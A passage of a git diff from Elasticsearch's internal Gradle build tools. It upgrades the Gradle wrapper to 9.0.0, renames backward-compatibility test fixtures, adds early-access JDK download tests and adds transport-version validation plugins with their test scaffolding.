project, NamedDomainObjectSet { + public static final String VERSIONS_EXT = "versions"; + @Override public void apply(Project project) { File workspaceDir = Util.locateElasticsearchWorkspace(project.getGradle()); @@ -28,6 +30,6 @@ public void apply(Project project) { .registerIfAbsent("versions", VersionPropertiesBuildService.class, spec -> {
spec.getParameters().getInfoPath().set(infoPath); }); - project.getExtensions().add("versions", serviceProvider.get().getProperties()); + project.getExtensions().add(VERSIONS_EXT, serviceProvider.get().getProperties()); } } diff --git a/build-tools-internal/build.gradle b/build-tools-internal/build.gradle index c04ba9b90d5e7..6f5dc5e0ca62c 100644 --- a/build-tools-internal/build.gradle +++ b/build-tools-internal/build.gradle @@ -220,6 +220,14 @@ gradlePlugin { id = 'elasticsearch.internal-yaml-rest-test' implementationClass = 'org.elasticsearch.gradle.internal.test.rest.InternalYamlRestTestPlugin' } + transportVersionReferencesPlugin { + id = 'elasticsearch.transport-version-references' + implementationClass = 'org.elasticsearch.gradle.internal.transport.TransportVersionReferencesPlugin' + } + transportVersionResourcesPlugin { + id = 'elasticsearch.transport-version-resources' + implementationClass = 'org.elasticsearch.gradle.internal.transport.TransportVersionResourcesPlugin' + } } } diff --git a/build-tools-internal/gradle/wrapper/gradle-wrapper.properties b/build-tools-internal/gradle/wrapper/gradle-wrapper.properties index c4a852da571d7..01450089d2c6c 100644 --- a/build-tools-internal/gradle/wrapper/gradle-wrapper.properties +++ b/build-tools-internal/gradle/wrapper/gradle-wrapper.properties @@ -1,7 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionSha256Sum=443c9c8ee2ac1ee0e11881a40f2376d79c66386264a44b24a9f8ca67e633375f -distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.2-all.zip +distributionSha256Sum=f759b8dd5204e2e3fa4ca3e73f452f087153cf81bac9561eeb854229cc2c5365 +distributionUrl=https\://services.gradle.org/distributions/gradle-9.0.0-all.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy index f7c05894d3e95..754431907ba60 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy @@ -10,7 +10,6 @@ package org.elasticsearch.gradle.fixtures import org.apache.commons.io.FileUtils -import org.elasticsearch.gradle.internal.test.InternalAwareGradleRunner import org.gradle.testkit.runner.GradleRunner import org.junit.Rule import org.junit.rules.TemporaryFolder @@ -27,6 +26,17 @@ abstract class AbstractGitAwareGradleFuncTest extends AbstractGradleFuncTest { execute("git clone ${remoteGitRepo.absolutePath} cloned", testProjectDir.root) buildFile = new File(testProjectDir.root, 'cloned/build.gradle') settingsFile = new File(testProjectDir.root, 'cloned/settings.gradle') + versionPropertiesFile = new File(testProjectDir.root, 'cloned/build-tools-internal/version.properties') + versionPropertiesFile.text = """ + elasticsearch = 9.1.0 + lucene = 10.2.2 + + bundled_jdk_vendor = openjdk + bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 + minimumJdkVersion = 21 + minimumRuntimeJava = 21 + minimumCompilerJava = 21 + """ } File setupGitRemote() { diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy 
b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy index 150f2b1130159..13d826ceffeb6 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy @@ -53,8 +53,10 @@ abstract class AbstractRestResourcesFuncTest extends AbstractGradleFuncTest { } """ - subProject(":distribution:archives:integ-test-zip") << "configurations.create('extracted')\n" - subProject(":distribution:archives:integ-test-zip") << "configurations.create('default')\n" + subProject(":distribution:archives:integ-test-zip") << """ +apply plugin: 'base' +configurations.create('extracted') +""" } void setupRestResources(List apis, List tests = [], List xpackTests = []) { diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy index 43edd15a5dcf6..eba9001ea761c 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy @@ -80,11 +80,8 @@ class InternalDistributionArchiveSetupPluginFuncTest extends AbstractGradleFuncT def "registered distribution provides archives and directory variant"() { given: file('someFile.txt') << "some content" - - settingsFile << """ - include ':consumer' - include ':producer-tar' - """ + subProject("consumer") + subProject("producer-tar") buildFile << """ import org.gradle.api.artifacts.type.ArtifactTypeDefinition; @@ -154,9 +151,7 @@ class InternalDistributionArchiveSetupPluginFuncTest extends AbstractGradleFuncT def "builds extracted distribution via extractedAssemble"() { given: file('someFile.txt') << "some content" - settingsFile << """ - include ':producer-tar' - """ + subProject("producer-tar") buildFile << """ import org.gradle.api.artifacts.type.ArtifactTypeDefinition; diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy index bb100b6b23882..9a235675918c6 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy @@ -51,23 +51,23 @@ class InternalDistributionBwcSetupPluginFuncTest extends AbstractGitAwareGradleF assertOutputContains(result.output, "[$bwcDistVersion] > Task :distribution:archives:darwin-tar:${expectedAssembleTaskName}") where: - bwcDistVersion | bwcProject | expectedAssembleTaskName - "8.4.0" | "minor" | "extractedAssemble" - "8.3.0" | "staged" | "extractedAssemble" - "8.2.1" | "bugfix" | "extractedAssemble" - "8.1.3" | "bugfix2" | "extractedAssemble" + bwcDistVersion | bwcProject | expectedAssembleTaskName + "8.4.0" | "major1" | "extractedAssemble" + "8.3.0" | "major2" | "extractedAssemble" + "8.2.1" | "major3" | "extractedAssemble" + "8.1.3" | "major4" | "extractedAssemble" } @Unroll 
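Note: the fixture renames in these tests (bugfix/staged/minor/major becoming major1..major4 and minor1..minor4) encode position rather than release state: unreleased branches that share the current major map to :distribution:bwc:minorN and branches of the previous major map to :distribution:bwc:majorN, numbered in descending version order. A simplified standalone sketch of that grouping, with hypothetical types (the real logic lives in BwcVersions.computeUnreleased, changed later in this patch):

    import java.util.ArrayList;
    import java.util.Comparator;
    import java.util.List;

    record Branch(String name, int major, int minor) {}

    class BwcProjectNaming {
        // Simplified: ignores the current branch itself and anything older than
        // the previous major, mirroring how bwc projects are assigned to branches.
        static List<String> projectsFor(List<Branch> branches, int currentMajor) {
            List<Branch> sorted = branches.stream()
                .sorted(Comparator.comparingInt(Branch::major).thenComparingInt(Branch::minor).reversed())
                .toList();
            List<String> projects = new ArrayList<>();
            int minorCount = 0;
            int majorCount = 0;
            for (Branch b : sorted) {
                if (b.major() == currentMajor) {
                    projects.add(":distribution:bwc:minor" + (++minorCount));
                } else if (b.major() == currentMajor - 1) {
                    projects.add(":distribution:bwc:major" + (++majorCount));
                }
            }
            return projects;
        }
    }
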
def "supports #platform aarch distributions"() { when: - def result = gradleRunner(":distribution:bwc:minor:buildBwc${platform.capitalize()}Aarch64Tar", + def result = gradleRunner(":distribution:bwc:major1:buildBwc${platform.capitalize()}Aarch64Tar", "-DtestRemoteRepo=" + remoteGitRepo, "-Dbwc.remote=origin", "-Dbwc.dist.version=${bwcDistVersion}-SNAPSHOT") .build() then: - result.task(":distribution:bwc:minor:buildBwc${platform.capitalize()}Aarch64Tar").outcome == TaskOutcome.SUCCESS + result.task(":distribution:bwc:major1:buildBwc${platform.capitalize()}Aarch64Tar").outcome == TaskOutcome.SUCCESS and: "assemble tasks triggered" assertOutputContains(result.output, "[$bwcDistVersion] > Task :distribution:archives:${platform}-aarch64-tar:extractedAssemble") @@ -87,7 +87,7 @@ class InternalDistributionBwcSetupPluginFuncTest extends AbstractGitAwareGradleF } dependencies { - expandedDist project(path: ":distribution:bwc:minor", configuration:"expanded-darwin-tar") + expandedDist project(path: ":distribution:bwc:major1", configuration:"expanded-darwin-tar") } tasks.register("resolveExpandedDistribution") { @@ -109,13 +109,12 @@ class InternalDistributionBwcSetupPluginFuncTest extends AbstractGitAwareGradleF .build() then: result.task(":resolveExpandedDistribution").outcome == TaskOutcome.SUCCESS - result.task(":distribution:bwc:minor:buildBwcDarwinTar").outcome == TaskOutcome.SUCCESS + result.task(":distribution:bwc:major1:buildBwcDarwinTar").outcome == TaskOutcome.SUCCESS and: "assemble task triggered" result.output.contains("[8.4.0] > Task :distribution:archives:darwin-tar:extractedAssemble") - result.output.contains("expandedRootPath /distribution/bwc/minor/build/bwc/checkout-8.x/" + + result.output.contains("expandedRootPath /distribution/bwc/major1/build/bwc/checkout-8.x/" + "distribution/archives/darwin-tar/build/install") - result.output.contains("nested folder /distribution/bwc/minor/build/bwc/checkout-8.x/" + + result.output.contains("nested folder /distribution/bwc/major1/build/bwc/checkout-8.x/" + "distribution/archives/darwin-tar/build/install/elasticsearch-8.4.0-SNAPSHOT") } - } diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy index fc5d432a9ef9a..c7643da1c73b9 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy @@ -51,7 +51,7 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest def "resolves expanded bwc versions from source"() { given: internalBuild() - bwcMinorProjectSetup() + bwcMajor1ProjectSetup() buildFile << """ apply plugin: 'elasticsearch.internal-distribution-download' @@ -72,16 +72,16 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest def result = gradleRunner("setupDistro").build() then: - result.task(":distribution:bwc:minor:buildBwcExpandedTask").outcome == TaskOutcome.SUCCESS + result.task(":distribution:bwc:major1:buildBwcExpandedTask").outcome == TaskOutcome.SUCCESS result.task(":setupDistro").outcome == TaskOutcome.SUCCESS - assertExtractedDistroIsCreated("distribution/bwc/minor/build/install/elastic-distro", + 
assertExtractedDistroIsCreated("distribution/bwc/major1/build/install/elastic-distro", 'bwc-marker.txt') } def "fails on resolving bwc versions with no bundled jdk"() { given: internalBuild() - bwcMinorProjectSetup() + bwcMajor1ProjectSetup() buildFile << """ apply plugin: 'elasticsearch.internal-distribution-download' @@ -105,12 +105,12 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest "without a bundled JDK is not supported.") } - private void bwcMinorProjectSetup() { + private void bwcMajor1ProjectSetup() { settingsFile << """ - include ':distribution:bwc:minor' + include ':distribution:bwc:major1' """ - def bwcSubProjectFolder = testProjectDir.newFolder("distribution", "bwc", "minor") - new File(bwcSubProjectFolder, 'bwc-marker.txt') << "bwc=minor" + def bwcSubProjectFolder = testProjectDir.newFolder("distribution", "bwc", "major1") + new File(bwcSubProjectFolder, 'bwc-marker.txt') << "bwc=major1" new File(bwcSubProjectFolder, 'build.gradle') << """ apply plugin:'base' @@ -167,6 +167,11 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest } } } + + tasks.named('assemble').configure { + dependsOn buildTar + } + artifacts { it.add("default", buildTar) it.add("extracted", buildExpanded) diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy index a4635a7232754..b9c0196530dfd 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy @@ -33,13 +33,18 @@ class JdkDownloadPluginFuncTest extends AbstractGradleFuncTest { private static final String ADOPT_JDK_VERSION_15 = "15.0.2+7" private static final String AZUL_JDK_VERSION_8 = "8u302+b08" private static final String AZUL_8_DISTRO_VERSION = "8.56.0.23" + private static final String CATALOG_EA_VERSION = "25-ea+30" private static final String OPEN_JDK_VERSION = "12.0.1+99@123456789123456789123456789abcde" private static final Pattern JDK_HOME_LOGLINE = Pattern.compile("JDK HOME: (.*)") + def setup() { + configurationCacheCompatible = false // JDK class references configurations which break configuration cache + } + @Unroll - def "jdk #jdkVendor for #platform#suffix are downloaded and extracted"() { + def "jdk #distributionVersion #jdkVendor for #platform#suffix are downloaded and extracted"() { given: - def mockRepoUrl = urlPath(jdkVendor, jdkVersion, platform, arch); + def mockRepoUrl = urlPath(jdkVendor, jdkVersion, platform, arch, distributionVersion); def mockedContent = filebytes(jdkVendor, platform) buildFile.text = """ plugins { @@ -77,21 +82,26 @@ class JdkDownloadPluginFuncTest extends AbstractGradleFuncTest { where: platform | arch | jdkVendor | jdkVersion | distributionVersion | expectedJavaBin | suffix - "linux" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "bin/java" | "" - "linux" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "bin/java" | "" - "linux" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "bin/java" | "(old version)" - "windows" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "bin/java" | "" - "windows" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "bin/java" | "" - "windows" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "bin/java" | "(old version)" - "darwin" | 
"x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "darwin" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "darwin" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "Contents/Home/bin/java" | "(old version)" - "mac" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "mac" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "Contents/Home/bin/java" | "(old version)" - "darwin" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "bin/java" | "" - "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_11 | null | "bin/java" | "(jdk 11)" - "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_15 | null | "bin/java" | "(jdk 15)" + "linux" | "aarch64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "bin/java" | "" + "linux" | "x64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "bin/java" | "" + "darwin" | "aarch64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "Contents/Home/bin/java" | "" + "darwin" | "x64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "Contents/Home/bin/java" | "" + "windows" | "x64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "bin/java" | "" + "linux" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "bin/java" | "" + "linux" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "bin/java" | "" + "linux" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "bin/java" | "(old version)" + "windows" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "bin/java" | "" + "windows" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "bin/java" | "" + "windows" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "bin/java" | "(old version)" + "darwin" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "darwin" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "darwin" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "Contents/Home/bin/java" | "(old version)" + "mac" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "mac" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "Contents/Home/bin/java" | "(old version)" + "darwin" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "bin/java" | "" + "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_11 | "" | "bin/java" | "(jdk 11)" + "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_15 | "" | "bin/java" | "(jdk 15)" "darwin" | "aarch64" | VENDOR_ZULU | AZUL_JDK_VERSION_8 | AZUL_8_DISTRO_VERSION | "Contents/Home/bin/java" | "(jdk 8)" } @@ -214,13 +224,19 @@ class JdkDownloadPluginFuncTest extends AbstractGradleFuncTest { private static String urlPath(final String vendor, final String version, final String platform, - final String arch = 'x64') { - if (vendor.equals(VENDOR_ADOPTIUM)) { + final String arch = 'x64', + final String distributedVersion = '') { + final boolean isOld = version.equals(OPENJDK_VERSION_OLD); + + if (distributedVersion.equals("ea")) { + def effectivePlatform = isMac(platform) ? "macos" : platform; + def fileExtension = platform.toLowerCase().equals("windows") ? 
"zip" : "tar.gz"; + return "/jdks/openjdk/25/openjdk-${version}/openjdk-${version}_$effectivePlatform-${arch}_bin.$fileExtension"; + } else if (vendor.equals(VENDOR_ADOPTIUM)) { final String module = isMac(platform) ? "mac" : platform; return "/jdk-" + version + "/" + module + "/${arch}/jdk/hotspot/normal/adoptium"; } else if (vendor.equals(VENDOR_OPENJDK)) { final String effectivePlatform = isMac(platform) ? "macos" : platform; - final boolean isOld = version.equals(OPENJDK_VERSION_OLD); final String versionPath = isOld ? "jdk1/99" : "jdk12.0.1/123456789123456789123456789abcde/99"; final String filename = "openjdk-" + (isOld ? "1" : "12.0.1") + "_" + effectivePlatform + "-x64_bin." + extension(platform); return "/java/GA/" + versionPath + "/GPL/" + filename; diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy index 57ba6a7773d50..c85a3042acbd7 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy @@ -9,7 +9,8 @@ package org.elasticsearch.gradle.internal -import spock.lang.Ignore + +import spock.lang.Unroll import org.apache.commons.compress.archivers.tar.TarArchiveEntry import org.apache.commons.compress.archivers.tar.TarArchiveInputStream @@ -17,7 +18,6 @@ import org.apache.commons.compress.compressors.bzip2.BZip2CompressorInputStream import org.apache.commons.compress.compressors.gzip.GzipCompressorInputStream import org.elasticsearch.gradle.fixtures.AbstractGradleFuncTest import org.gradle.api.GradleException -import spock.lang.Unroll import java.nio.file.Files import java.nio.file.Path @@ -66,8 +66,12 @@ tasks.register("buildBZip2Tar", SymbolicLinkPreservingTar) { SymbolicLinkPreserv from fileTree("archiveRoot") into('config') { - dirMode 0750 - fileMode 0660 + dirPermissions { + unix(0750) + } + filePermissions { + unix(0660) + } from "real-folder2" } } @@ -118,8 +122,10 @@ tasks.register("buildTar", SymbolicLinkPreservingTar) { SymbolicLinkPreservingTa preserverTimestamp << [true, false] } - private boolean assertTar(final File archive, final Function wrapper, boolean preserveFileTimestamps) - throws IOException { + private boolean assertTar(final File archive, + final Function wrapper, + boolean preserveFileTimestamps) + throws IOException { try (TarArchiveInputStream tar = new TarArchiveInputStream(wrapper.apply(new FileInputStream(archive)))) { TarArchiveEntry entry = tar.getNextTarEntry(); boolean realFolderEntry = false; @@ -132,7 +138,7 @@ tasks.register("buildTar", SymbolicLinkPreservingTar) { SymbolicLinkPreservingTa if (entry.getName().equals("real-folder/")) { assert entry.isDirectory() realFolderEntry = true - } else if (entry.getName().equals("real-folder/file")) { + } else if (entry.getName().equals("real-folder/file")) { assert entry.isFile() fileEntry = true } else if (entry.getName().equals("real-folder/link-to-file")) { @@ -145,7 +151,7 @@ tasks.register("buildTar", SymbolicLinkPreservingTar) { SymbolicLinkPreservingTa } else if (entry.getName().equals("config/sub/")) { assert entry.isDirectory() assert entry.getMode() == 16872 - }else if (entry.getName().equals("link-in-folder/")) { + } else if (entry.getName().equals("link-in-folder/")) { assert entry.isDirectory() 
linkInFolderEntry = true } else if (entry.getName().equals("link-in-folder/link-to-file")) { diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy index 15b057a05e039..2d08f34e16f03 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy @@ -40,7 +40,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe given: internalBuild() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -61,11 +61,11 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe result.task(transformTask).outcome == TaskOutcome.NO_SOURCE } - def "yamlRestCompatTest executes and copies api and transforms tests from :bwc:minor"() { + def "yamlRestCompatTest executes and copies api and transforms tests from :bwc:major1"() { given: internalBuild() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -98,8 +98,8 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe String api = "foo.json" String test = "10_basic.yml" //add the compatible test and api files, these are the prior version's normal yaml rest tests - file("distribution/bwc/minor/checkoutDir/rest-api-spec/src/main/resources/rest-api-spec/api/" + api) << "" - file("distribution/bwc/minor/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/" + test) << "" + file("distribution/bwc/major1/checkoutDir/rest-api-spec/src/main/resources/rest-api-spec/api/" + api) << "" + file("distribution/bwc/major1/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/" + test) << "" when: def result = gradleRunner("yamlRestCompatTest").build() @@ -145,7 +145,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe given: internalBuild() withVersionCatalogue() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -186,7 +186,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe given: internalBuild() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -230,7 +230,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe setupRestResources([], []) - file("distribution/bwc/minor/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/test.yml" ) << """ + file("distribution/bwc/major1/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/test.yml" ) << """ "one": - do: do_.some.key_to_replace: diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/AbstractTransportVersionFuncTest.groovy 
b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/AbstractTransportVersionFuncTest.groovy new file mode 100644 index 0000000000000..5c63de1701c4f --- /dev/null +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/AbstractTransportVersionFuncTest.groovy @@ -0,0 +1,127 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport + +import org.elasticsearch.gradle.fixtures.AbstractGradleFuncTest +import org.gradle.testkit.runner.BuildResult +import org.gradle.testkit.runner.TaskOutcome + +class AbstractTransportVersionFuncTest extends AbstractGradleFuncTest { + def javaResource(String project, String path, String content) { + file("${project}/src/main/resources/${path}").withWriter { writer -> + writer << content + } + } + + def javaSource(String project, String packageName, String className, String imports, String content) { + String packageSlashes = packageName.replace('.', '/') + file("${project}/src/main/java/${packageSlashes}/${className}.java").withWriter { writer -> + writer << """ + package ${packageName}; + ${imports} + public class ${className} { + ${content} + } + """ + } + } + + def referableTransportVersion(String name, String ids) { + javaResource("myserver", "transport/definitions/referable/" + name + ".csv", ids) + } + + def unreferableTransportVersion(String name, String id) { + javaResource("myserver", "transport/definitions/unreferable/" + name + ".csv", id) + } + + def referableAndReferencedTransportVersion(String name, String ids) { + return referableAndReferencedTransportVersion(name, ids, "Test${name.capitalize()}") + } + + def referableAndReferencedTransportVersion(String name, String ids, String classname) { + javaSource("myserver", "org.elasticsearch", classname, "", """ + static final TransportVersion usage = TransportVersion.fromName("${name}"); + """) + referableTransportVersion(name, ids) + } + + def transportVersionUpperBound(String branch, String name, String id) { + javaResource("myserver", "transport/upper_bounds/" + branch + ".csv","${name},${id}") + } + + def validateReferencesFails(String project) { + return gradleRunner(":${project}:validateTransportVersionReferences").buildAndFail() + } + + def validateResourcesFails() { + return gradleRunner(":myserver:validateTransportVersionResources").buildAndFail() + } + + def assertValidateReferencesFailure(BuildResult result, String project, String expectedOutput) { + result.task(":${project}:validateTransportVersionReferences").outcome == TaskOutcome.FAILED + assertOutputContains(result.output, expectedOutput) + } + + def assertValidateResourcesFailure(BuildResult result, String expectedOutput) { + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.FAILED + assertOutputContains(result.output, expectedOutput) + } + + def setup() { + configurationCacheCompatible = false + internalBuild() + settingsFile << """ + include ':myserver' + include ':myplugin' + """ + + file("myserver/build.gradle") << """ + apply plugin: 'java-library' + apply plugin: 
'elasticsearch.transport-version-references' + apply plugin: 'elasticsearch.transport-version-resources' + """ + referableTransportVersion("existing_91", "8012000") + referableTransportVersion("existing_92", "8123000,8012001") + unreferableTransportVersion("initial_9_0_0", "8000000") + transportVersionUpperBound("9.2", "existing_92", "8123000") + transportVersionUpperBound("9.1", "existing_92", "8012001") + // a mock version of TransportVersion, just here so we can compile Dummy.java et al + javaSource("myserver", "org.elasticsearch", "TransportVersion", "", """ + public static TransportVersion fromName(String name) { + return null; + } + """) + javaSource("myserver", "org.elasticsearch", "Dummy", "", """ + static final TransportVersion existing91 = TransportVersion.fromName("existing_91"); + static final TransportVersion existing92 = TransportVersion.fromName("existing_92"); + """) + + file("myplugin/build.gradle") << """ + apply plugin: 'java-library' + apply plugin: 'elasticsearch.transport-version-references' + + dependencies { + implementation project(":myserver") + } + """ + + setupLocalGitRepo() + execute("git checkout -b main") + execute("git checkout -b test") + } + + void setupLocalGitRepo() { + execute("git init") + execute('git config user.email "build-tool@elastic.co"') + execute('git config user.name "Build tool"') + execute("git add .") + execute('git commit -m "Initial"') + } +} diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/TransportVersionValidationFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/TransportVersionValidationFuncTest.groovy new file mode 100644 index 0000000000000..36be4c4d94bff --- /dev/null +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/TransportVersionValidationFuncTest.groovy @@ -0,0 +1,255 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
